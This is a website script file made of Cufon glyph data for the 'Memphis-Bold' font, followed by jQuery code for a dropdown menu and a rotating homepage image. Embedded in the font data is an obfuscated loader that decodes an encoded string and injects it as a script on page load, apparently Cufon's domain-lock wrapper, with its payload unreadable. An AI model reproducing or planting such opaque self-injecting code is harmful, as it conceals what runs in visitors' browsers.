23,0r0,35r-98,0r0,-35","w":240},{"d":"14,-266v43,2,63,6,64,50v1,42,-12,97,28,102v-70,9,28,167,-92,151r0,-4v59,-8,-7,-133,56,-147v-63,-6,5,-130,-56,-147r0,-5","w":119},{"d":"139,-140v0,36,-59,39,-62,6r-2,0r0,100r23,0r0,34r-85,0r0,-34r20,0r0,-98r-20,0r0,-34r62,0v1,7,-3,19,2,22v3,-38,62,-31,62,4","w":140,"k":{".":20,"-":13,",":20}},{"w":90},{"d":"6,-260r96,0r0,35r-26,0r50,144r39,-144r-26,0r0,-35r94,0r0,35r-21,0r-69,225r-34,0r-81,-225r-22,0r0,-35","w":240,"k":{"y":13,"u":13,"r":13,"o":27,"i":13,"e":27,"a":27,"A":27,";":27,":":27,".":33,"-":27,",":33}},{"d":"204,-77v2,90,-100,78,-192,77r0,-35r27,0r0,-190r-27,0r0,-35v80,2,182,-17,182,66v0,28,-17,43,-37,52v27,12,47,28,47,65xm157,-78v0,-40,-30,-47,-71,-45r0,88v40,1,71,-2,71,-43xm147,-193v0,-33,-29,-33,-61,-32r0,67v34,2,61,-1,61,-35","w":219},{"d":"150,6v-86,-1,-134,-57,-137,-135v-3,-74,61,-136,137,-136v76,0,137,62,137,136v0,73,-65,136,-137,135xm151,-222v-57,0,-91,43,-91,98v0,46,40,87,87,87v53,0,93,-42,93,-94v0,-48,-40,-91,-89,-91","w":299},{"d":"27,-123r63,-131r36,0r63,131r-40,0r-41,-91r-42,91r-39,0","w":216},{"d":"14,-166r67,0r0,132r25,0r0,34r-91,0r0,-34r24,0r0,-98r-25,0r0,-34xm81,-195r-58,0r0,-45r58,0r0,45","w":119},{"d":"104,-111r0,37r-88,0r0,-37r88,0","w":119},{"d":"147,-83r-130,-55r0,-39r182,78r0,32r-182,78r0,-39","w":216},{"d":"147,-111v-4,-38,-58,-22,-70,-1r0,78r26,0r0,34r-91,0r0,-34r24,0r0,-98r-24,0r0,-34r64,0r0,21v28,-32,112,-37,112,24r0,87r24,0r0,34r-89,0r0,-34r24,0r0,-77","w":219},{"d":"45,-60v18,0,33,14,32,32v0,18,-15,32,-32,32v-17,0,-32,-14,-32,-32v-1,-18,14,-32,32,-32","w":90},{"d":"106,37v-45,0,-63,-5,-65,-49v-2,-41,13,-97,-27,-102v69,-10,-29,-165,92,-151r0,3v-59,8,7,135,-56,148v62,6,-5,130,56,147r0,4","w":119},{"d":"205,-75v0,76,-98,105,-147,59r0,16r-38,0r0,-89r37,0v3,33,25,59,62,59v33,0,52,-44,29,-65v-49,-27,-130,-17,-130,-99v0,-65,93,-93,134,-49r0,-17r38,0r0,78r-36,0v-7,-26,-21,-47,-53,-47v-32,0,-51,42,-22,56v49,25,126,18,126,98","w":219},{"d":"100,-31v47,1,43,-53,42,-101r-25,0r0,-34r67,0r0,132r23,0r0,34r-63,0r0,-22v-27,33,-110,42,-110,-28r0,-82r-23,0r0,-34r64,0r0,102v1,24,2,33,25,33","w":219},{"d":"102,-260v94,2,138,46,146,134v-10,84,-56,124,-148,126r-90,0r0,-35r27,0r0,-190r-27,0r0,-35r92,0xm201,-123v3,-68,-40,-108,-117,-102r0,190v74,9,115,-31,117,-88","w":259},{"d":"8,-6v20,1,31,0,31,-22r0,-197r-30,0r0,-35r103,0r0,35r-27,0r0,199v2,54,-23,70,-77,66r0,-46","w":119},{"d":"41,0r0,-34r29,0r0,-186r-29,0r0,-34r72,0r0,220r30,0r0,34r-102,0"},{"d":"87,-119v1,65,-20,114,-46,156r-33,0v53,-77,53,-225,0,-302r32,-1v23,42,47,87,47,147","w":100},{"d":"86,-260v74,-4,89,82,50,132r-69,88r57,0r0,-34r40,0r0,74r-150,0r0,-40r97,-119v17,-28,4,-67,-34,-60v-23,5,-24,35,-23,66r-41,0v-6,-66,18,-104,73,-107"},{"d":"89,-166r38,0r0,64r64,0r0,38r-64,0r0,64r-38,0r0,-64r-64,0r0,-38r64,0r0,-64","w":216},{"d":"45,-60v18,0,33,14,32,32v0,18,-15,32,-32,32v-17,0,-32,-14,-32,-32v-1,-18,14,-32,32,-32xm45,-170v17,0,32,14,32,32v0,18,-14,33,-32,33v-18,0,-32,-15,-32,-33v0,-18,15,-32,32,-32","w":90},{"d":"108,-225v-36,-8,-29,28,-29,59r28,0r0,34r-28,0r0,98r28,0r0,34r-94,0r0,-34r25,0r0,-98r-26,0r0,-34r26,0v-3,-59,5,-102,70,-94r0,35","w":119},{"d":"13,-131v0,-109,118,-167,200,-112r0,-17r38,0r0,84r-38,0v-8,-28,-33,-45,-68,-46v-52,-2,-86,42,-85,92v0,51,32,93,85,93v40,0,60,-22,74,-49r43,0v-11,57,-55,91,-117,92v-74,2,-132,-62,-132,-137","w":280},{"d":"123,-74v9,-54,-42,-61,-88,-52r0,-128r111,0r0,39r-68,0r0,48v60,-2,90,30,89,87v-1,51,-25,86,-79,86v-52,0,-76,-34,-75,-86r41,0v1,27,3,48,33,47v23,0,33,-21,36,-41"},{"d":"10,0r0,-35r27,0r0,-190r-27,0r0,-35r200,0r0,69r-42,0r0,-34r-84,0r0,66r73,0r0,41r-73,0r0,83r84,0r0,-43r42,0r0,78r-200,0","w":219},{"d":"116,-135v-20,0,-31,14,-39,26r0,75r22,0r0,34r-87,0r0,-34r24,0r0,-98r-23,0r0,-34r63,0r0,21v19,-29,89,-37,100,4v30,-41,122,-42,111,36r0,71r24,0r0,34r-87,0r0,-34r22,0v-5,-37,17,-101,-25,-101v-20,0,-31,14,-39,26r0,75r22,0r0,34r-86,0r0,-34r23,0v-5,-37,17,-101,-25,-101","w":320},{"d":"213,-261r26,0r-150,271r-26,0xm226,6v-31,0,-60,-26,-60,-58v0,-34,28,-59,60,-59v32,0,60,25,60,59v0,31,-29,59,-60,58xm226,-78v-14,0,-28,10,-28,26v0,16,14,26,28,26v14,0,28,-10,28,-26v0,-16,-14,-26,-28,-26xm74,-143v-32,0,-60,-25,-60,-58v0,-33,28,-59,60,-59v32,0,60,25,60,59v0,31,-29,58,-60,58xm102,-201v0,-17,-16,-24,-28,-27v-13,1,-28,11,-28,27v0,16,14,26,28,26v14,0,28,-10,28,-26","w":299},{"d":"31,-62r46,0r-30,76r-46,0","w":90},{"d":"13,31r0,-291r80,0r0,31r-42,0r0,229r42,0r0,31r-80,0","w":100},{"d":"87,6v-41,-1,-75,-34,-74,-78r0,-103v-8,-77,85,-110,130,-62v13,15,19,33,19,55r-40,-1v-1,-21,-10,-37,-33,-37v-32,0,-34,41,-32,79v42,-37,110,-4,110,63v0,51,-29,85,-80,84xm90,-118v-32,-2,-42,50,-23,73v21,25,57,4,57,-31v0,-24,-14,-41,-34,-42"},{"d":"6,0r0,-35r22,0r65,-190r-29,0r0,-35r134,0r0,35r-28,0r63,190r20,0r0,35r-96,0r0,-35r29,0r-18,-51r-79,0r-17,51r28,0r0,35r-94,0xm159,-121r-30,-88r-30,88r60,0","w":259,"k":{"\u2019":33,"y":20,"w":20,"v":20,"Y":27,"W":27,"V":27,"T":27}},{"d":"13,-109v-1,-66,22,-113,46,-157r33,0v-53,78,-52,224,0,303r-32,0v-23,-42,-46,-87,-47,-146","w":100},{"d":"7,-260r90,0r0,35r-24,0r45,147r41,-147r-24,0r0,-35r93,0r0,35r-24,0r44,147r43,-147r-24,0r0,-35r86,0r0,35r-19,0r-71,225r-32,0r-51,-159r-48,159r-32,0r-74,-225r-19,0r0,-35","w":360,"k":{"y":6,"u":13,"r":13,"o":27,"i":6,"e":27,"a":27,"A":27,";":20,":":20,".":33,"-":20,",":33}},{"d":"14,-171r0,-83r154,0r0,39r-88,215r-46,0r87,-215r-64,0r0,44r-43,0"},{"d":"10,-84v0,-61,74,-116,122,-68r0,-14r34,0r0,57v-40,8,-35,-25,-69,-26v-29,-1,-43,24,-45,51v-4,57,69,67,93,26r26,23v-19,21,-39,39,-77,39v-49,0,-84,-38,-84,-88"},{"d":"87,-60v18,0,33,14,32,32v0,18,-15,32,-32,32v-17,0,-32,-14,-32,-32v-1,-18,14,-32,32,-32xm85,-220v-24,0,-32,17,-34,38r-40,0v3,-47,31,-78,80,-78v39,0,74,31,73,71v-1,42,-23,65,-59,72r0,39r-41,0r0,-71v31,4,59,-6,59,-36v0,-24,-15,-35,-38,-35"},{"d":"40,-265v16,1,20,12,18,29r-9,78v-4,10,-19,6,-19,-5v0,-28,-8,-59,-7,-85v1,-9,5,-18,17,-17","w":79},{"d":"12,-187r0,-73r195,0r0,73r-41,0r0,-38r-33,0r0,190r32,0r0,35r-110,0r0,-35r31,0r0,-190r-32,0r0,38r-42,0","w":219,"k":{"y":27,"w":33,"u":27,"s":27,"r":27,"o":27,"i":13,"e":27,"c":27,"a":27,"A":27,";":20,":":20,".":27,"-":27,",":27}},{"d":"84,2r-56,-134r-20,0r0,-34r82,0r0,34r-18,0r30,76r30,-76r-21,0r0,-34r81,0r0,34r-19,0r-61,134r-28,0","w":200,"k":{".":27,",":27}},{"d":"209,-177v0,69,-55,87,-124,81r0,61r33,0r0,35r-108,0r0,-35r28,0r0,-190r-28,0r0,-35v95,0,199,-12,199,83xm162,-177v0,-43,-35,-50,-77,-48r0,94v40,2,77,-3,77,-46","w":219,"k":{"A":20,".":46,",":46}},{"d":"122,-72v1,-30,-13,-41,-41,-42r0,-32v25,0,37,-11,38,-36v0,-21,-9,-38,-32,-38v-31,0,-30,30,-30,61r-40,0v-3,-63,20,-97,72,-101v66,-5,97,91,49,130v53,35,25,136,-48,136v-54,0,-77,-43,-76,-95r40,0v2,28,4,56,36,56v21,0,31,-20,32,-39"},{"d":"9,0r0,-35r28,0r0,-190r-28,0r0,-35r102,0r0,35r-27,0r0,66r92,0r0,-66r-27,0r0,-35r102,0r0,35r-28,0r0,190r28,0r0,35r-102,0r0,-35r27,0r0,-83r-92,0r0,83r27,0r0,35r-102,0","w":259},{"d":"186,0r-107,-198r0,163r29,0r0,35r-96,0r0,-35r24,0r0,-190r-24,0r0,-35r85,0r84,160r0,-125r-27,0r0,-35r97,0r0,35r-27,0r0,225r-38,0","w":259},{"d":"0,45r0,-22r180,0r0,22r-180,0"},{"d":"12,0r0,-35r29,0r0,-190r-29,0r0,-35r108,0r0,35r-32,0r0,190r62,0r0,-42r41,0r0,77r-179,0","w":200,"k":{"\u2019":40,"y":20,"Y":33,"W":33,"V":33,"T":27}},{"d":"11,-83v-7,-75,92,-115,135,-61r0,-22r63,0r0,34r-25,0r0,173r25,0r0,34r-91,0r0,-34r25,0v-1,-19,2,-42,-1,-59v-43,50,-140,6,-131,-65xm100,-31v31,0,48,-25,48,-53v0,-28,-17,-51,-48,-51v-31,0,-48,23,-48,51v0,28,17,53,48,53","w":219},{"d":"10,-83v0,-75,95,-115,137,-61r0,-22r61,0r0,34r-24,0r0,125v9,92,-105,96,-163,62r0,-40v33,28,138,42,123,-36v-42,54,-134,10,-134,-62xm99,-31v31,0,48,-25,48,-53v0,-28,-17,-51,-48,-51v-30,0,-47,24,-47,51v0,28,17,53,47,53","w":219},{"w":90},{"d":"27,-265v16,-1,19,15,17,29r-8,78v-5,10,-20,5,-20,-5r-7,-85v2,-9,6,-17,18,-17xm93,-265v16,1,20,12,18,29r-9,78v-4,11,-20,4,-20,-5v-1,-28,-7,-59,-6,-85v1,-9,5,-18,17,-17","w":119},{"d":"224,-137v-8,30,-23,55,-38,78r24,25r33,0r0,34r-58,0r-27,-29v-19,20,-40,34,-75,35v-38,1,-69,-29,-69,-67v0,-38,28,-56,46,-74v-14,-16,-29,-37,-29,-66v0,-34,28,-59,62,-59v31,0,60,27,59,59v-1,30,-19,53,-37,67r46,47v9,-16,20,-31,26,-50r-21,0r0,-34r77,0r0,34r-19,0xm84,-108v-26,13,-47,77,1,77v19,0,36,-14,47,-24xm92,-229v-41,2,-24,60,-1,70v10,-11,27,-24,26,-44v-1,-15,-9,-26,-25,-26","w":259},{"d":"210,-83v0,71,-88,115,-133,65r0,59r25,0r0,34r-90,0r0,-34r24,0r0,-173r-24,0r0,-34r62,0r0,22v15,-12,30,-26,58,-26v41,0,78,41,78,87xm120,-31v31,0,48,-25,48,-53v0,-28,-17,-51,-48,-51v-30,0,-47,24,-47,51v0,28,17,53,47,53","w":219},{"d":"57,-243r33,53r-40,0r-49,-53r56,0","w":119},{"d":"158,-35r-73,-99r0,99r27,0r0,35r-100,0r0,-35r26,0r0,-190r-25,0r0,-35r99,0r0,35r-27,0r0,85r73,-85r-25,0r0,-35r97,0r0,35r-18,0r-73,88r73,102r20,0r0,35r-100,0r0,-35r26,0","w":240},{"d":"151,4v-61,10,-115,-26,-114,-85r0,-144r-26,0r0,-35r101,0r0,35r-28,0r0,134v1,33,8,54,48,54v44,0,44,-32,44,-69r0,-119r-28,0r0,-35r101,0r0,35r-26,0r0,138v3,55,-31,84,-72,91","w":259},{"d":"31,-62r46,0r-30,76r-46,0xm45,-170v17,0,32,14,32,32v0,18,-14,33,-32,33v-18,0,-32,-15,-32,-33v0,-18,15,-32,32,-32","w":90},{"d":"33,-34r43,-49r-41,-49r-22,0r0,-34r67,0r0,26r22,28v10,-15,25,-25,21,-54r63,0r0,34r-24,0r-41,48r41,50r24,0r0,34r-69,0r0,-31r-21,-26r-19,24r0,33r-64,0r0,-34r20,0","w":200},{"d":"199,11r-182,-78r0,-32r182,-78r0,39r-130,55r130,55r0,39","w":216},{"d":"162,-72r-31,0r-9,72r-32,0r9,-72r-32,0r-10,72r-32,0r9,-72r-29,0r4,-32r30,0r6,-44r-31,0r5,-32r30,0r9,-74r32,0r-9,74r32,0r10,-74r32,0r-9,74r30,0r-4,32r-30,0r-6,44r30,0xm77,-148r-6,44r33,0r5,-44r-32,0"},{"d":"158,-91v-1,-32,-41,-27,-73,-27r0,83r28,0r0,35r-103,0r0,-35r28,0r0,-190r-28,0r0,-35v83,7,198,-26,203,65v2,35,-17,47,-40,60v43,5,30,56,32,100r25,0r0,35r-72,0r0,-91xm167,-192v0,-39,-46,-30,-82,-33r0,72v41,-1,82,5,82,-39","w":240,"k":{"y":6,"Y":13,"W":13,"V":13,"T":6}},{"d":"10,39v17,-2,26,-14,26,-33r0,-138r-23,0r0,-34r65,0r0,180v0,46,-27,55,-68,61r0,-36xm21,-240r57,0r0,45r-57,0r0,-45","w":100},{"d":"9,0r0,-35r28,0r0,-190r-28,0r0,-35r101,0r0,35r-26,0r0,190r26,0r0,35r-101,0","w":119},{"d":"216,-225r-73,102r0,88r29,0r0,35r-105,0r0,-35r29,0r0,-90r-71,-100r-19,0r0,-35r96,0r0,35r-24,0r47,66r45,-66r-23,0r0,-35r86,0r0,35r-17,0","w":240,"k":{"v":20,"u":20,"q":33,"p":20,"o":33,"i":13,"e":33,"a":33,"A":27,";":27,":":27,".":33,"-":27,",":33}},{"d":"90,-260v74,0,99,100,43,131v59,30,34,135,-43,135v-77,0,-101,-104,-43,-136v-56,-29,-31,-130,43,-130xm90,-109v-33,-3,-42,46,-24,66v19,20,57,8,57,-28v0,-24,-12,-36,-33,-38xm90,-220v-20,0,-32,15,-32,36v0,22,12,37,32,37v20,0,32,-15,32,-37v0,-22,-12,-36,-32,-36"},{"d":"11,-83v0,-72,87,-115,132,-64r0,-79r-25,0r0,-34r66,0r0,226r24,0r0,34r-60,0r0,-22v-43,54,-137,15,-137,-61xm100,-31v31,0,48,-25,48,-53v0,-28,-17,-51,-48,-51v-31,0,-47,23,-47,51v0,29,16,53,47,53","w":219}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+93-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("XYIb$=^T>N1jXR}rK=UE:Y:1dn^bI=1jdn.E>NJuI|L-;GT&>UbVJfT{JEH&+_%gqn+Td0+EioS*Nu}Td0+EioUf`|Abif%A`UAbifSEiu*%)|Abif%E^=U-d0+EioUg3}Abif%A^0AqdY1qK):@i)^siU@#N0bEd0+@iYWV|g.~d=gz~=ej3b^bJSwAX):s`=Io^+|z._A$^gSw|%hRoSUY0:.X9i^`~WJ_)+|Nd;I>$qK3cx{&fg}=uwHMs-zj#@AEGTbnVe*FrL168GKf~EK+K}%G_S*c)0Uud0+@iYS@dR:=qYh9|)ze~R^_>g}I`YW&9u^@$Y}TXR:&X_AH~)%-qob&9u%-$ob@9=A}$=KT>RAu~N:jI&*u$0}@>0i13VTr>N;w;&*#>GT#d&x8`uKVKb@jX)Lw~GHf;N*&Id.E;d^GKd^T;N}j;N.-IN{#Kd^}dR*f$nbq9=UbcResdR*f;N*&Id.E;d^GKd^T;N}j;N.-IN{#Kd^}dR*f$nbq9=UbcResdR*f$V|f>Y^EINUT>dI}dR*jIdJq9=UbX_W#>_*TId^TXYA#;nUT>N1j9={#qVJj;Nb}X_}=$V:w`ngL$o-sXngHIbzfNn}Kd)b@Nn}Kc_gwX_%x")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":180,"face":{"font-family":"Memphis-Bold","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"4","bbox":"-23 -273 360 75","underline-thickness":"18","underline-position":"-19.8","unicode-range":"U+0020-U+2122"}}));




//INIT

Cufon.replace('h1,h2,h3,#dropmenu > li > ul > li > a,#subpages li a');

//DROPDOWN

// JavaScript Document

$(function(){
	Site.init();
});

var Site = {
	menuIndex: 3000,
	menudelay: false,
	init: function() {
		
		setTimeout(Site.autoHomeInit,Site.autoHomeSpeed);
		
		//drop menu
		$('#dropmenu > li > ul').hide();
		
		$('#dropmenu li').mouseover(function(){
			clearTimeout(Site.menudelay);
			$(this).siblings('li').find('ul').fadeOut(80);
			$(this).css('zIndex',Site.menuIndex);
			Site.menuIndex++;
			$(this).children('ul:hidden').slideDown(150);
		}).mouseout(function(){
			var xx = this;
			Site.menudelay = setTimeout(function(){
				$(xx).children('ul:visible').fadeOut(80);
			},100);
		});
		
		$('#menu li a').mouseover(function(){
			$(this).css('opacity','0.8');							   
		}).mouseout(function(){
			$(this).css('opacity','1');	
		});
		
	},
	
	//AUTO HOMEPAGE
	autoHomeNow: 1,
	autoHomeSpeed: 5000,
	autoHomeImages: 8,
	autoHomeTimer: false,
	autoHomeInit: function(){
		
		Site.autoHomeNow++;
		
		if (Site.autoHomeNow > Site.autoHomeImages) {
			Site.autoHomeNow = 1;
		}
		
		var oldimg = $('#featureimg img:eq(0)');
		var newimg = $('<img/>');
		
		newimg.css({
			position: 'absolute',
			zIndex: 5
		}).attr('src','/wp-content/themes/csh/resources/images/home_image'+Site.autoHomeNow+'.jpg');
		
		oldimg.css({
			position: 'absolute',
			zIndex: 10
		}).after(newimg);
		
		$(newimg).load(function(){
			$(oldimg).fadeOut('slow',function(){
				$('#featureimg img:eq(0)').remove();
			});
		});

		//repeat
		Site.autoHomeTimer = setTimeout(Site.autoHomeInit,Site.autoHomeSpeed);
		
	}
	
};

